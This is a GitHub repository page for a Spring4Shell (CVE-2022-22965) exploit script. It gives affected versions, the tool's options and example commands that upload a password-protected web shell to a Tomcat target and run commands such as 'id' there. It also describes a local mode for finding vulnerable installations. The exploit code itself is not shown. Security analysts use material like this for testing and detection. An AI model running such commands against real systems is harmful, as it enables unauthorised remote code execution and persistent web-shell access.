Skip to content

ligeroIT/spring4shell-exploit

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

23 Commits
images
images
 
 
CVE-2022-22965_exploit.py
CVE-2022-22965_exploit.py
 
 
README.md
README.md
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

Spring4Shell Exploit

Exploit script for the Spring4Shell vulnerability on input URLs. This script can also be run on the target machines to identify the paths to affected installations.

The Spring Framework provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.spring-core is a prevalent framework widely used in Java applications that allows software developers to develop Java applications with enterprise-level components effortlessly

Note: Exploitation Script has been tested on applications deployed using Apache Tomcat Server. The auth checks will only work on linux based distributions.

Prerequisite's

  • Apache Tomcat as the Servlet container Packaged as a traditional WAR (in contrast to a Spring Boot executable jar)
  • JDK 9 or higher
  • spring-webmvc or spring-webflux dependency Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions

Usage

  • python3 -m pip install -r requirements.txt
  • python3 CVE-2022-22965_exploit.py --help
usage: CVE-2022-22965_exploit.py [-h] [-f FILE] [-u URL] [-c CMD] [-d] [-p PASSWORD] [-t TIMEOUT] [-a]

CVE-2022-22965 Exploit code

options:
  -h, --help                         Show this help message and exit
  -f FILE, --file FILE               File containing URLs to exploit
  -u URL, --url URL                  Target URL to exploit
  -c CMD, --cmd CMD                  Command to run on target
  -d, --debug                        Print the Error
  -p PASSWORD, --password PASSWORD   Password for the web shell
  -t TIMEOUT, --timeout TIMEOUT      Timeout for the web shell to get Uploaded
  -a, --auth                         Run on the host to check for vulnerable installations

Demo

asciicast

Example: 1

Run the script against single URL to exploit Spring4Shell Vulnerability

python3 CVE-2022-22965_exploit.py -u http://172.17.0.1:8888/spring-form/greeting

Example: 2

Run the script for Multiple URLs by providing text file with ips to detect Spring4Shell Vulnerability

python3 CVE-2022-22965_exploit.py -f ips.txt

Example: 3

Run the script against single URL to exploit Spring4Shell Vulnerability along with the provided password for web shell

python3 CVE-2022-22965_exploit.py -u http://172.17.0.1:8888/spring-form/greeting -p csw

Example: 4

Run the script on the target machine to detect all the vulnerable installations path. Run as root to have more coverage

python3 CVE-2022-22965_exploit.py -a

Sample Testing

Running the script against the target -

python3 CVE-2022-22965_exploit.py -u http://172.17.0.1:8888/spring-form/greeting

Output -

Running the script against the target along with the password -

python3 CVE-2022-22965_exploit.py -u http://172.17.0.1:8888/spring-form/greeting -c id -p csw

Output -

Running the script on the target to identify the vulnerable installations -

python3 CVE-2022-22965_exploit.py -a

Output -

References

https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/

https://github.com/TheGejr/SpringShell/blob/master/exp.py

https://twitter.com/RandoriAttack/status/1509298490106593283

Created By

Sriraam
Security Analyst
Cyber Security Works

Contributions

Arjun Anand
Ridhwan R
Security Analyst
Cyber Security Works

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%